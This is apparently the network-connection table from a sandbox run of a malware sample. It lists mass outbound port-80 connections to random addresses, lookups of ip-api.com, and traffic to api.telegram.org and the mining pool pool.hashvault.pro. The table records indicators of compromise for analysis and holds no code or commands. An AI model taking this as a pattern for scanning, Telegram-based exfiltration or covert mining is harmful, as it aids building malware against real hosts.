| US | 155.164.75.245:80 | tcp | |
| EG | 156.182.16.233:80 | tcp | |
| US | 73.252.173.19:80 | tcp | |
| US | 140.74.69.140:80 | tcp | |
| CA | 99.236.11.74:80 | tcp | |
| US | 135.244.38.247:80 | tcp | |
| US | 96.37.235.138:80 | tcp | |
| N/A | 100.124.230.211:80 | tcp | |
| SG | 43.51.9.25:80 | tcp | |
| SG | 61.16.105.236:80 | tcp | |
| UA | 195.178.149.181:80 | tcp | |
| CN | 123.92.69.215:80 | tcp | |
| CN | 8.141.164.130:80 | tcp | |
| KR | 166.104.123.159:80 | tcp | |
| N/A | 10.9.92.229:80 | tcp | |
| US | 164.153.92.83:80 | tcp | |
| CN | 117.79.178.82:80 | tcp | |
| KR | 166.104.123.159:80 | tcp | |
| PT | 79.168.110.61:80 | tcp | |
| AU | 115.64.156.12:80 | tcp | |
| US | 143.187.233.105:80 | tcp | |
| VE | 190.37.106.123:80 | tcp | |
| US | 161.206.255.170:80 | tcp | |
| US | 21.250.132.57:80 | tcp | |
| JP | 157.63.211.144:80 | tcp | |
| CN | 121.194.147.188:80 | tcp | |
| CN | 36.112.181.44:80 | tcp | |
| US | 21.52.20.144:80 | tcp | |
| US | 16.61.160.65:80 | tcp | |
| US | 8.8.8.8:53 | 159.123.104.166.in-addr.arpa | udp |
| JP | 194.53.191.205:80 | tcp | |
| JP | 126.199.119.145:80 | tcp | |
| US | 107.3.126.39:80 | tcp | |
| JP | 114.168.240.79:80 | tcp | |
| AR | 181.23.27.247:80 | tcp | |
| IT | 79.42.218.151:80 | tcp | |
| BR | 201.25.94.164:80 | tcp | |
| BR | 179.64.9.195:80 | tcp | |
| GB | 86.181.106.132:80 | tcp | |
| FR | 15.237.240.70:80 | tcp | |
| US | 30.124.40.110:80 | tcp | |
| TN | 196.227.117.85:80 | tcp | |
| KR | 39.20.61.163:80 | tcp | |
| IE | 56.52.195.8:80 | tcp | |
| US | 172.89.234.204:80 | tcp | |
| US | 152.70.156.238:80 | tcp | |
| US | 205.115.248.170:80 | tcp | |
| FR | 139.124.124.124:80 | tcp | |
| US | 206.164.23.40:80 | tcp | |
| AU | 147.41.240.134:80 | tcp | |
| KR | 203.225.34.134:80 | tcp | |
| DE | 141.45.17.44:80 | tcp | |
| CH | 91.108.184.72:80 | tcp | |
| CN | 36.115.197.90:80 | tcp | |
| US | 76.181.139.195:80 | tcp | |
| CN | 222.94.28.83:80 | tcp | |
| US | 131.53.105.120:80 | tcp | |
| CN | 129.204.41.4:80 | tcp | |
| CN | 58.253.67.48:80 | tcp | |
| US | 140.64.241.182:80 | tcp | |
| RO | 5.83.45.64:80 | tcp | |
| CN | 59.75.239.24:80 | tcp | |
| RO | 5.83.45.64:80 | 5.83.45.64 | tcp |
| US | 50.37.140.98:80 | tcp | |
| CN | 218.106.232.13:80 | tcp | |
| US | 215.2.57.172:80 | tcp | |
| US | 143.181.174.29:80 | tcp | |
| US | 73.78.137.86:80 | tcp | |
| NL | 194.45.86.116:80 | tcp | |
| JP | 153.183.221.240:80 | tcp | |
| EG | 154.190.184.70:80 | tcp | |
| MG | 154.126.96.13:80 | tcp | |
| US | 48.201.108.119:80 | tcp | |
| US | 71.157.136.149:80 | tcp | |
| BR | 201.59.136.45:80 | tcp | |
| GA | 41.158.242.199:80 | tcp | |
| EG | 105.199.99.3:80 | tcp | |
| SG | 27.111.144.122:80 | tcp | |
| RU | 5.35.106.55:80 | tcp | |
| US | 38.184.29.43:80 | tcp | |
| CH | 178.82.226.111:80 | tcp | |
| CN | 121.197.161.164:80 | tcp | |
| US | 8.8.8.8:53 | 64.45.83.5.in-addr.arpa | udp |
| DE | 213.20.197.251:80 | tcp | |
| US | 99.145.132.126:80 | tcp | |
| JP | 150.71.102.58:80 | tcp | |
| ZA | 165.149.137.83:80 | tcp | |
| KR | 60.196.148.195:80 | tcp | |
| DE | 213.68.157.249:80 | tcp | |
| CN | 43.195.162.212:80 | tcp | |
| DE | 79.236.199.85:80 | tcp | |
| US | 146.57.77.226:80 | tcp | |
| CN | 115.170.123.233:80 | tcp | |
| JP | 125.199.25.48:80 | tcp | |
| IR | 5.112.144.16:80 | tcp | |
| FI | 164.13.70.49:80 | tcp | |
| JP | 121.82.210.82:80 | tcp | |
| DE | 87.155.231.215:80 | tcp | |
| IE | 143.239.68.194:80 | tcp | |
| JP | 133.55.51.90:80 | tcp | |
| CH | 178.195.86.121:80 | tcp | |
| US | 72.47.40.32:80 | tcp | |
| GB | 86.134.115.165:80 | tcp | |
| US | 4.32.191.168:80 | tcp | |
| KR | 223.46.225.164:80 | tcp | |
| US | 135.202.34.203:80 | tcp | |
| US | 6.78.93.110:80 | tcp | |
| US | 28.197.56.47:80 | tcp | |
| US | 35.93.240.43:80 | tcp | |
| US | 57.170.49.53:80 | tcp | |
| US | 161.47.169.84:80 | tcp | |
| US | 51.10.210.163:80 | tcp | |
| US | 76.47.14.252:80 | tcp | |
| US | 98.195.147.215:80 | tcp | |
| US | 158.145.20.66:80 | tcp | |
| IL | 2.54.26.88:80 | tcp | |
| CN | 110.59.205.92:80 | tcp | |
| RU | 109.184.199.50:80 | tcp | |
| BR | 200.147.221.160:80 | tcp | |
| FR | 37.167.149.237:80 | tcp | |
| US | 204.177.97.68:80 | tcp | |
| US | 56.62.144.59:80 | tcp | |
| US | 71.126.5.143:80 | tcp | |
| BR | 189.120.88.104:80 | tcp | |
| IR | 62.60.175.134:80 | tcp | |
| US | 6.202.94.136:80 | tcp | |
| US | 99.0.18.234:80 | tcp | |
| JP | 126.190.234.101:80 | tcp | |
| US | 156.66.102.246:80 | tcp | |
| US | 29.255.148.127:80 | tcp | |
| CN | 61.135.246.236:80 | tcp | |
| US | 73.35.186.119:80 | tcp | |
| US | 16.135.244.96:80 | tcp | |
| US | 50.178.70.212:80 | tcp | |
| NL | 161.88.168.63:80 | tcp | |
| US | 136.63.240.187:80 | tcp | |
| CN | 119.2.202.83:80 | tcp | |
| CO | 179.15.184.210:80 | tcp | |
| RS | 46.240.148.200:80 | tcp | |
| US | 66.81.144.187:80 | tcp | |
| US | 205.205.200.162:80 | tcp | |
| US | 167.211.209.154:80 | tcp | |
| CL | 190.160.194.142:80 | tcp | |
| CN | 111.51.194.157:80 | tcp | |
| EG | 196.205.207.11:80 | tcp | |
| DE | 83.126.104.207:80 | tcp | |
| TW | 140.112.110.127:80 | tcp | |
| AE | 31.29.81.215:80 | tcp | |
| US | 68.16.57.96:80 | tcp | |
| TW | 111.248.69.16:80 | tcp | |
| SG | 156.249.45.76:80 | tcp | |
| BR | 177.68.89.7:80 | tcp | |
| GU | 114.142.209.86:80 | tcp | |
| FR | 185.252.237.166:80 | tcp | |
| US | 208.175.30.89:80 | tcp | |
| US | 173.18.15.143:80 | tcp | |
| US | 108.98.128.138:80 | tcp | |
| TW | 203.69.225.205:80 | tcp | |
| US | 96.18.228.167:80 | tcp | |
| KR | 61.101.184.72:80 | tcp | |
| US | 139.241.178.246:80 | tcp | |
| BY | 46.216.182.232:80 | tcp | |
| ZA | 13.244.147.173:80 | tcp | |
| US | 142.197.116.206:80 | tcp | |
| GU | 114.142.209.86:80 | 114.142.209.86 | tcp |
| US | 66.68.28.253:80 | tcp | |
| ZA | 13.244.147.173:80 | 13.244.147.173 | tcp |
| CN | 211.97.210.203:80 | tcp | |
| US | 69.209.93.84:80 | tcp | |
| CN | 182.81.98.23:80 | tcp | |
| US | 68.251.249.24:80 | tcp | |
| IN | 117.237.231.233:80 | tcp | |
| PS | 213.6.180.71:80 | tcp | |
| HR | 88.207.124.31:80 | tcp | |
| CN | 110.179.71.29:80 | tcp | |
| GB | 25.92.175.207:80 | tcp | |
| MX | 148.210.194.159:80 | tcp | |
| BR | 190.89.166.54:80 | tcp | |
| DE | 53.172.84.156:80 | tcp | |
| ID | 103.105.129.13:80 | tcp | |
| US | 8.8.8.8:53 | 86.209.142.114.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 173.147.244.13.in-addr.arpa | udp |
| US | 40.129.63.104:80 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 192.1.5.214:80 | tcp | |
| US | 209.48.195.240:80 | tcp | |
| US | 28.185.162.208:80 | tcp | |
| JP | 220.8.189.254:80 | tcp | |
| AE | 5.30.198.103:80 | tcp | |
| BR | 187.91.212.9:80 | tcp | |
| N/A | 100.103.41.62:80 | tcp | |
| HK | 58.96.170.216:80 | tcp | |
| JP | 133.126.91.229:80 | tcp | |
| US | 29.202.254.176:80 | tcp | |
| CN | 113.206.67.100:80 | tcp | |
| MA | 105.145.253.64:80 | tcp | |
| US | 38.96.196.198:80 | tcp | |
| IT | 5.170.153.192:80 | tcp | |
| JP | 114.69.62.76:80 | tcp | |
| CN | 36.169.19.197:80 | tcp | |
| US | 34.30.158.180:80 | tcp | |
| DE | 84.131.202.126:80 | tcp | |
| IN | 101.218.14.123:80 | tcp | |
| KR | 223.52.126.234:80 | tcp | |
| AU | 110.20.233.122:80 | tcp | |
| JP | 221.46.223.168:80 | tcp | |
| DE | 143.93.234.24:80 | tcp | |
| KR | 175.237.12.202:80 | tcp | |
| US | 131.150.198.76:80 | tcp | |
| SA | 100.195.195.44:80 | tcp | |
| AR | 200.59.239.53:80 | tcp | |
| US | 46.169.192.242:80 | tcp | |
| NL | 92.120.134.3:80 | tcp | |
| US | 29.253.150.125:80 | tcp | |
| US | 29.193.29.125:80 | tcp | |
| ID | 111.95.140.21:80 | tcp | |
| US | 63.71.103.200:80 | tcp | |
| CN | 119.86.94.49:80 | tcp | |
| CN | 123.149.26.142:80 | tcp | |
| US | 209.33.14.177:80 | tcp | |
| US | 162.82.197.185:80 | tcp | |
| CN | 118.78.4.159:80 | tcp | |
| ID | 149.129.252.224:80 | tcp | |
| US | 136.6.126.111:80 | tcp | |
| DK | 5.103.171.189:80 | tcp | |
| US | 185.199.111.133:443 | raw.githubusercontent.com | tcp |
| CN | 58.66.124.120:80 | tcp | |
| US | 148.100.252.197:80 | tcp | |
| US | 12.248.214.227:80 | tcp | |
| JP | 106.165.204.100:80 | tcp | |
| CN | 36.249.130.59:80 | tcp | |
| JP | 126.66.242.197:80 | tcp | |
| TW | 140.124.59.195:80 | tcp | |
| ES | 84.120.157.52:80 | tcp | |
| CA | 205.250.231.168:80 | tcp | |
| RU | 62.117.116.38:80 | tcp | |
| US | 169.130.223.111:80 | tcp | |
| US | 198.39.152.254:80 | tcp | |
| CA | 134.195.144.133:80 | tcp | |
| US | 13.225.218.20:80 | tcp | |
| US | 13.225.218.20:80 | 13.225.218.20 | tcp |
| US | 216.224.28.150:80 | tcp | |
| JP | 125.203.95.149:80 | tcp | |
| IT | 81.56.178.121:80 | tcp | |
| US | 99.5.222.45:80 | tcp | |
| JP | 110.162.236.5:80 | tcp | |
| US | 206.118.34.14:80 | tcp | |
| US | 167.5.142.81:80 | tcp | |
| US | 8.8.8.8:53 | 20.218.225.13.in-addr.arpa | udp |
| US | 97.222.220.37:80 | tcp | |
| BR | 189.115.25.3:80 | tcp | |
| US | 199.253.156.185:80 | tcp | |
| SE | 37.199.209.73:80 | tcp | |
| US | 134.159.48.242:80 | tcp | |
| TW | 110.24.86.102:80 | tcp | |
| CA | 138.214.186.170:80 | tcp | |
| US | 172.178.246.175:80 | tcp | |
| IT | 95.241.98.241:80 | tcp | |
| ID | 111.95.40.186:80 | tcp | |
| US | 38.27.247.49:80 | tcp | |
| CA | 38.117.73.29:80 | tcp | |
| SE | 4.223.123.166:80 | tcp | |
| DK | 80.62.113.131:80 | tcp | |
| US | 134.149.242.27:80 | tcp | |
| US | 147.49.204.92:80 | tcp | |
| US | 43.221.67.178:80 | tcp | |
| JP | 49.133.86.237:80 | tcp | |
| US | 69.243.186.73:80 | tcp | |
| GB | 138.40.210.204:80 | tcp | |
| US | 170.99.191.179:80 | tcp | |
| NL | 185.218.138.200:80 | tcp | |
| US | 157.246.127.16:80 | tcp | |
| BR | 179.237.169.80:80 | tcp | |
| CN | 182.241.117.89:80 | tcp | |
| GB | 17.79.29.19:80 | tcp | |
| US | 66.54.228.129:80 | tcp | |
| US | 173.23.36.55:80 | tcp | |
| DE | 217.184.185.34:80 | tcp | |
| ES | 90.170.75.88:80 | tcp | |
| US | 98.171.115.253:80 | tcp | |
| US | 159.105.76.171:80 | tcp | |
| AO | 154.127.132.186:80 | tcp | |
| CN | 27.194.129.223:80 | tcp | |
| SI | 149.62.115.65:80 | tcp | |
| DE | 79.248.187.104:80 | tcp | |
| IT | 31.189.237.102:80 | tcp | |
| US | 174.201.73.147:80 | tcp | |
| US | 174.131.46.124:80 | tcp | |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| US | 21.112.153.12:80 | tcp | |
| VN | 14.234.60.137:80 | tcp | |
| US | 129.186.140.185:80 | tcp | |
| US | 98.147.13.38:80 | tcp | |
| US | 164.50.57.166:80 | tcp | |
| CH | 162.86.149.135:80 | tcp | |
| NL | 172.255.224.48:80 | tcp | |
| US | 8.8.8.8:53 | google.com | udp |
| US | 149.35.129.83:80 | tcp | |
| JP | 160.249.70.21:80 | tcp | |
| US | 208.18.235.17:80 | tcp | |
| US | 24.95.255.255:80 | tcp | |
| US | 64.67.33.14:80 | tcp | |
| US | 8.8.8.8:53 | api.telegram.org | udp |
| US | 34.235.132.197:80 | tcp | |
| CA | 24.138.175.180:80 | tcp | |
| CN | 118.244.103.9:80 | tcp | |
| US | 48.135.186.197:80 | tcp | |
| HR | 89.201.160.60:80 | tcp | |
| ZA | 41.122.234.214:80 | tcp | |
| HR | 89.201.160.60:80 | 89.201.160.60 | tcp |
| US | 166.39.106.105:80 | tcp | |
| ES | 185.69.10.254:80 | tcp | |
| BR | 204.216.175.120:80 | tcp | |
| KR | 122.41.78.226:80 | tcp | |
| JP | 221.33.107.86:80 | tcp | |
| US | 28.234.251.19:80 | tcp | |
| KR | 223.54.110.191:80 | tcp | |
| NL | 194.10.6.131:80 | tcp | |
| CA | 167.248.175.106:80 | tcp | |
| US | 24.24.61.66:80 | tcp | |
| US | 64.68.3.77:80 | tcp | |
| EG | 105.44.68.31:80 | tcp | |
| TH | 61.19.138.219:80 | tcp | |
| US | 48.32.21.92:80 | tcp | |
| JP | 126.187.108.199:80 | tcp | |
| US | 8.8.8.8:53 | 60.160.201.89.in-addr.arpa | udp |
| US | 173.87.35.166:80 | tcp | |
| ZA | 41.25.29.157:80 | tcp | |
| US | 165.82.9.241:80 | tcp | |
| CN | 39.75.145.49:80 | tcp | |
| US | 11.115.76.217:80 | tcp | |
| CN | 221.200.238.7:80 | tcp | |
| CN | 47.107.75.144:80 | tcp | |
| US | 8.41.113.203:80 | tcp | |
| RU | 78.36.169.90:80 | tcp | |
| US | 173.130.104.28:80 | tcp | |
| US | 70.245.53.254:80 | tcp | |
| SE | 178.30.124.30:80 | tcp | |
| US | 22.92.102.235:80 | tcp | |
| US | 206.157.114.150:80 | tcp | |
| US | 98.163.157.45:80 | tcp | |
| US | 15.191.124.127:80 | tcp | |
| US | 148.137.41.159:80 | tcp | |
| US | 51.81.59.204:80 | tcp | |
| US | 207.237.179.79:80 | tcp | |
| GB | 81.159.34.83:80 | tcp | |
| IN | 112.79.190.225:80 | tcp | |
| US | 207.251.219.16:80 | tcp | |
| US | 51.81.59.204:80 | 51.81.59.204 | tcp |
| CN | 112.101.252.206:80 | tcp | |
| DE | 109.75.26.199:80 | tcp | |
| US | 66.176.179.9:80 | tcp | |
| MA | 41.251.63.247:80 | tcp | |
| US | 51.81.59.204:443 | tcp | |
| ES | 87.125.140.43:80 | tcp | |
| BR | 179.85.166.193:80 | tcp | |
| NZ | 111.69.57.123:80 | tcp | |
| GB | 64.209.105.22:80 | tcp | |
| EG | 45.109.80.25:80 | tcp | |
| VN | 42.117.94.162:80 | tcp | |
| US | 8.8.8.8:53 | 204.59.81.51.in-addr.arpa | udp |
| FR | 81.54.82.53:80 | tcp | |
| US | 136.0.85.238:80 | tcp | |
| CN | 111.174.208.201:80 | tcp | |
| US | 167.120.206.197:80 | tcp | |
| IN | 14.99.232.132:80 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| CN | 112.192.243.86:80 | tcp | |
| CN | 111.61.106.254:80 | tcp | |
| US | 174.243.178.88:80 | tcp | |
| BH | 37.131.60.98:80 | tcp | |
| KR | 211.244.104.172:80 | tcp | |
| AU | 157.155.93.130:80 | tcp | |
| CN | 106.225.98.19:80 | tcp | |
| NL | 185.52.7.177:80 | tcp | |
| JP | 126.88.145.185:80 | tcp | |
| US | 156.84.237.237:80 | tcp | |
| GB | 25.25.184.143:80 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| FR | 92.131.190.111:80 | tcp | |
| US | 8.8.8.8:53 | 220.167.154.149.in-addr.arpa | udp |
| US | 24.45.83.235:80 | tcp | |
| US | 208.117.247.179:80 | tcp | |
| AT | 193.41.201.201:80 | tcp | |
| BR | 187.107.12.9:80 | tcp | |
| US | 74.205.148.216:80 | tcp | |
| US | 63.143.171.211:80 | tcp | |
| FR | 132.227.78.8:80 | tcp | |
| US | 141.106.64.228:80 | tcp | |
| AE | 92.99.27.155:80 | tcp | |
| HK | 202.133.12.143:80 | tcp | |
| US | 70.246.236.187:80 | tcp | |
| BD | 113.11.14.157:80 | tcp | |
| US | 12.233.77.19:80 | tcp | |
| US | 155.78.166.37:80 | tcp | |
| GB | 159.65.92.163:80 | tcp | |
| GB | 159.65.92.163:80 | 159.65.92.163 | tcp |
| US | 173.125.61.158:80 | tcp | |
| US | 130.31.13.162:80 | tcp | |
| SG | 43.72.7.47:80 | tcp | |
| ID | 182.9.227.240:80 | tcp | |
| US | 8.8.8.8:53 | 163.92.65.159.in-addr.arpa | udp |
| AR | 181.22.90.85:80 | tcp | |
| US | 18.71.37.235:80 | tcp | |
| US | 64.97.54.87:80 | tcp | |
| ES | 88.1.93.113:80 | tcp | |
| US | 54.111.156.99:80 | tcp | |
| US | 54.121.53.1:80 | tcp | |
| JP | 147.160.176.46:80 | tcp | |
| US | 11.10.3.236:80 | tcp | |
| AU | 58.164.9.147:80 | tcp | |
| SG | 43.61.203.12:80 | tcp | |
| JP | 180.55.99.249:80 | tcp | |
| US | 129.111.187.51:80 | tcp | |
| US | 104.64.235.52:80 | tcp | |
| ID | 125.164.25.185:80 | tcp | |
| US | 12.199.77.144:80 | tcp | |
| GB | 213.48.64.219:80 | tcp | |
| US | 172.126.252.12:80 | tcp | |
| RU | 95.108.207.47:80 | tcp | |
| CN | 119.166.103.193:80 | tcp | |
| US | 33.109.56.201:80 | tcp | |
| KE | 196.101.177.126:80 | tcp | |
| RU | 89.252.89.161:80 | tcp | |
| JP | 133.86.223.51:80 | tcp | |
| TN | 160.156.175.120:80 | tcp | |
| US | 134.16.83.114:80 | tcp | |
| IT | 176.245.3.100:80 | tcp | |
| US | 32.54.16.147:80 | tcp | |
| IT | 94.82.173.96:80 | tcp | |
| IN | 119.43.101.224:80 | tcp | |
| TH | 164.115.25.14:80 | tcp | |
| JP | 111.104.115.218:80 | tcp | |
| US | 7.100.248.220:80 | tcp | |
| US | 214.182.62.42:80 | tcp | |
| CN | 106.237.208.141:80 | tcp | |
| AU | 115.186.249.199:80 | tcp | |
| TH | 164.115.25.14:80 | 164.115.25.14 | tcp |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 214.101.200.174:80 | tcp | |
| DE | 213.135.24.2:80 | tcp | |
| CN | 124.75.34.109:80 | tcp | |
| IT | 85.36.249.252:80 | tcp | |
| RU | 212.73.114.122:80 | tcp | |
| PR | 207.204.169.122:80 | tcp | |
| US | 67.88.141.39:80 | tcp | |
| CO | 181.248.164.136:80 | tcp | |
| TR | 149.140.40.230:80 | tcp | |
| US | 165.230.82.213:80 | tcp | |
| ZA | 168.209.86.159:80 | tcp | |
| CO | 190.69.4.73:80 | tcp | |
| US | 100.13.35.25:80 | tcp | |
| IT | 79.19.60.67:80 | tcp | |
| US | 8.8.8.8:53 | 14.25.115.164.in-addr.arpa | udp |
| NO | 193.91.149.204:80 | tcp | |
| US | 135.57.103.5:80 | tcp | |
| HK | 223.18.96.124:80 | tcp | |
| GB | 86.139.52.131:80 | tcp | |
| MU | 196.167.21.142:80 | tcp | |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| NZ | 118.82.215.35:80 | tcp | |
| CN | 116.194.86.47:80 | tcp | |
| GB | 195.152.12.88:80 | tcp | |
| US | 172.126.195.94:80 | tcp | |
| US | 136.216.96.115:80 | tcp | |
| JP | 52.197.185.178:80 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 128.159.144.40:80 | tcp | |
| HU | 31.46.126.134:80 | tcp | |
| CO | 181.157.103.197:80 | tcp | |
| JP | 202.53.208.132:80 | tcp | |
| US | 138.147.216.63:80 | tcp | |
| NL | 145.181.28.152:80 | tcp | |
| US | 19.238.238.13:80 | tcp | |
| US | 11.195.217.51:80 | tcp | |
| US | 64.115.205.86:80 | tcp | |
| US | 65.25.72.65:80 | tcp | |
| TH | 101.109.107.45:80 | tcp | |
| IT | 79.36.69.131:80 | tcp | |
| ES | 212.230.115.70:80 | tcp | |
| US | 131.107.35.168:80 | tcp | |
| US | 136.20.92.253:80 | tcp | |
| MX | 201.107.254.181:80 | tcp | |
| TW | 218.174.66.128:80 | tcp | |
| CN | 117.138.79.212:80 | tcp | |
| BR | 191.192.41.97:80 | tcp | |
| NZ | 161.29.235.158:80 | tcp | |
| CN | 116.78.43.44:80 | tcp | |
| US | 54.114.44.108:80 | tcp | |
| US | 163.126.130.66:80 | tcp | |
| CA | 138.214.193.21:80 | tcp | |
| JP | 219.193.42.105:80 | tcp | |
| MA | 105.159.21.76:80 | tcp | |
| US | 104.81.51.141:80 | tcp | |
| DE | 80.146.123.134:80 | tcp | |
| GB | 178.98.39.241:80 | tcp | |
| IN | 117.253.134.238:80 | tcp | |
| CA | 24.70.77.116:80 | tcp | |
| US | 141.238.129.91:80 | tcp | |
| KR | 106.255.125.126:80 | tcp | |
| CN | 112.80.27.168:80 | tcp | |
| JP | 126.49.209.173:80 | tcp | |
| US | 130.6.251.136:80 | tcp | |
| SE | 95.204.124.20:80 | tcp | |
| US | 158.2.56.195:80 | tcp | |
| US | 71.150.154.102:80 | tcp | |
| DE | 80.134.232.82:80 | tcp | |
| CN | 106.126.171.240:80 | tcp | |
| GB | 87.83.17.30:80 | tcp | |
| DE | 141.32.55.254:80 | tcp | |
| AU | 61.68.194.140:80 | tcp | |
| US | 68.57.133.21:80 | tcp | |
| US | 35.145.191.8:80 | tcp | |
| IN | 13.127.194.221:80 | tcp | |
| US | 131.3.187.66:80 | tcp | |
| JP | 58.85.67.99:80 | tcp | |
| US | 191.96.112.71:80 | tcp | |
| US | 128.183.33.203:80 | tcp | |
| JP | 14.193.69.44:80 | tcp | |
| GB | 46.248.234.238:80 | tcp | |
| US | 191.96.112.71:80 | 191.96.112.71 | tcp |
| IN | 13.127.194.221:80 | 13.127.194.221 | tcp |
| IN | 202.177.128.211:80 | tcp | |
| US | 98.19.198.8:80 | tcp | |
| CN | 223.1.43.168:80 | tcp | |
| IN | 121.246.167.63:80 | tcp | |
| US | 173.134.181.52:80 | tcp | |
| US | 50.41.58.196:80 | tcp | |
| US | 8.8.8.8:53 | 71.112.96.191.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 221.194.127.13.in-addr.arpa | udp |
| DE | 63.190.136.205:80 | tcp | |
| US | 67.243.213.178:80 | tcp | |
| KR | 182.173.102.236:80 | tcp | |
| US | 174.236.137.60:80 | tcp | |
| DE | 87.179.57.101:80 | tcp | |
| BR | 138.99.110.124:80 | tcp | |
| JP | 180.6.155.170:80 | tcp | |
| US | 139.233.28.134:80 | tcp | |
| KZ | 2.132.91.199:80 | tcp | |
| US | 216.88.255.8:80 | tcp | |
| ES | 89.6.127.2:80 | tcp | |
| UZ | 178.216.135.6:80 | tcp | |
| KR | 223.26.160.211:80 | tcp | |
| HK | 47.56.195.75:80 | tcp | |
| US | 209.74.103.78:80 | tcp | |
| US | 55.148.11.141:80 | tcp | |
| PH | 112.207.132.19:80 | tcp | |
| US | 16.254.227.93:80 | tcp | |
| AU | 130.95.38.210:80 | tcp | |
| CN | 219.218.81.102:80 | tcp | |
| TR | 176.237.247.125:80 | tcp | |
| DE | 194.64.58.61:80 | tcp | |
| US | 71.129.220.81:80 | tcp | |
| NO | 77.17.124.218:80 | tcp | |
| NL | 23.197.158.171:80 | tcp | |
| CH | 138.228.220.131:80 | tcp | |
| NL | 23.197.158.171:80 | 23.197.158.171 | tcp |
| US | 8.8.8.8:53 | pool.hashvault.pro | udp |
| DE | 45.76.89.70:443 | pool.hashvault.pro | tcp |
| US | 63.121.123.140:80 | tcp | |
| IT | 151.95.119.200:80 | tcp | |
| US | 166.251.173.248:80 | tcp | |
| UA | 95.134.161.176:80 | tcp | |
| DE | 130.83.69.137:80 | tcp | |
| KR | 59.27.215.22:80 | tcp | |
| CA | 174.116.187.26:80 | tcp | |
| US | 29.231.159.227:80 | tcp | |
| US | 8.8.8.8:53 | 171.158.197.23.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 70.89.76.45.in-addr.arpa | udp |
| EG | 156.190.60.184:80 | tcp | |
| HK | 168.106.231.194:80 | tcp | |
| US | 135.94.94.30:80 | tcp | |
| ZA | 169.159.190.141:80 | tcp | |
| US | 168.224.225.99:80 | tcp | |
| US | 15.30.203.241:80 | tcp | |
| US | 135.193.191.218:80 | tcp | |
| SA | 149.232.64.71:80 | tcp | |
| KR | 182.199.48.72:80 | tcp | |
| DE | 188.103.193.125:80 | tcp | |
| CN | 115.191.82.61:80 | tcp | |
| FR | 93.18.120.100:80 | tcp | |
| SG | 4.145.81.32:80 | tcp | |
| CA | 138.11.61.23:80 | tcp | |
| ID | 47.78.34.251:80 | tcp | |
| DE | 134.104.142.117:80 | tcp | |
| US | 131.187.171.252:80 | tcp | |
| US | 24.58.205.183:80 | tcp | |
| US | 174.210.192.196:80 | tcp | |
| SG | 4.145.81.32:80 | 4.145.81.32 | tcp |
| VN | 171.246.131.66:80 | tcp | |
| DK | 95.166.144.2:80 | tcp | |
| US | 73.220.125.2:80 | tcp | |
| US | 18.0.193.132:80 | tcp | |
| BY | 82.209.203.46:80 | tcp | |
| US | 148.26.164.223:80 | tcp | |
| CN | 106.5.255.32:80 | tcp | |
| GB | 25.222.69.253:80 | tcp | |
| US | 128.166.216.24:80 | tcp | |
| US | 9.209.42.167:80 | tcp | |
| SG | 20.24.136.97:80 | tcp | |
| US | 74.147.232.73:80 | tcp | |
| US | 52.144.14.27:80 | tcp | |
| CN | 123.15.81.202:80 | tcp | |
| US | 8.8.8.8:53 | 32.81.145.4.in-addr.arpa | udp |
| US | 98.194.73.246:80 | tcp | |
| NL | 81.205.80.239:80 | tcp | |
| IN | 106.201.126.234:80 | tcp | |
| IE | 185.94.46.177:80 | tcp | |
| JP | 220.144.156.75:80 | tcp | |
| US | 57.116.109.25:80 | tcp | |
| US | 69.238.80.197:80 | tcp | |
| SK | 95.103.129.67:80 | tcp | |
| DE | 139.23.77.147:80 | tcp | |
| DE | 213.254.32.182:80 | tcp | |
| FR | 83.195.239.8:80 | tcp | |
| US | 51.8.10.163:80 | tcp | |
| IL | 131.125.237.110:80 | tcp | |
| US | 208.34.79.91:80 | tcp | |
| CH | 92.105.163.60:80 | tcp | |
| JP | 107.148.99.211:80 | tcp | |
| US | 22.58.33.236:80 | tcp | |
| RU | 188.234.80.207:80 | tcp | |
| AU | 139.132.248.76:80 | tcp | |
| JP | 107.148.99.211:80 | 107.148.99.211 | tcp |
| CN | 59.191.12.129:80 | tcp | |
| US | 104.2.124.55:80 | tcp | |
| CN | 123.117.74.34:80 | tcp | |
| US | 100.19.217.166:80 | tcp | |
| US | 50.102.7.120:80 | tcp | |
| RU | 94.139.113.13:80 | tcp | |
| US | 96.209.206.42:80 | tcp | |
| US | 35.25.242.104:80 | tcp | |
| NG | 196.200.78.102:80 | tcp | |
| BE | 109.133.146.13:80 | tcp | |
| HK | 4.191.247.171:80 | tcp | |
| GB | 90.222.86.145:80 | tcp | |
| MX | 201.149.159.48:80 | tcp | |
| KZ | 194.58.42.154:80 | 194.58.42.154 | tcp |
| NL | 91.141.219.174:80 | tcp | |
| GB | 78.151.88.9:80 | tcp | |
| US | 8.8.8.8:53 | 211.99.148.107.in-addr.arpa | udp |
| HK | 82.199.153.89:80 | tcp | |
| FR | 82.245.81.132:80 | tcp | |
| HK | 119.237.40.139:80 | tcp | |
| CN | 119.164.5.73:80 | tcp | |
| US | 172.44.107.39:80 | tcp | |
| US | 75.192.181.242:80 | tcp | |
| CN | 115.150.172.197:80 | tcp | |
| US | 174.198.97.59:80 | tcp | |
| CN | 119.120.3.173:80 | tcp | |
| CN | 180.171.30.43:80 | tcp | |
| CZ | 90.176.155.165:80 | tcp | |
| GB | 149.50.13.237:80 | tcp | |
| BR | 189.62.55.250:80 | tcp | |
| CN | 43.137.146.159:80 | tcp | |
| US | 8.8.8.8:53 | 154.42.58.194.in-addr.arpa | udp |
| CN | 36.0.72.221:80 | tcp | |
| DE | 89.247.210.110:80 | tcp | |
| JP | 133.61.132.35:80 | tcp | |
| US | 45.56.90.233:80 | tcp | |
| US | 17.87.91.35:80 | tcp | |
| US | 26.10.188.91:80 | tcp | |
| US | 98.167.40.177:80 | tcp | |
| US | 165.7.81.242:80 | tcp | |
| US | 198.214.210.156:80 | tcp | |
| BE | 44.11.215.236:80 | tcp | |
| NL | 145.41.1.128:80 | tcp | |
| US | 75.213.35.177:80 | tcp | |
| CN | 110.116.236.252:80 | tcp | |
| US | 135.45.140.104:80 | tcp | |
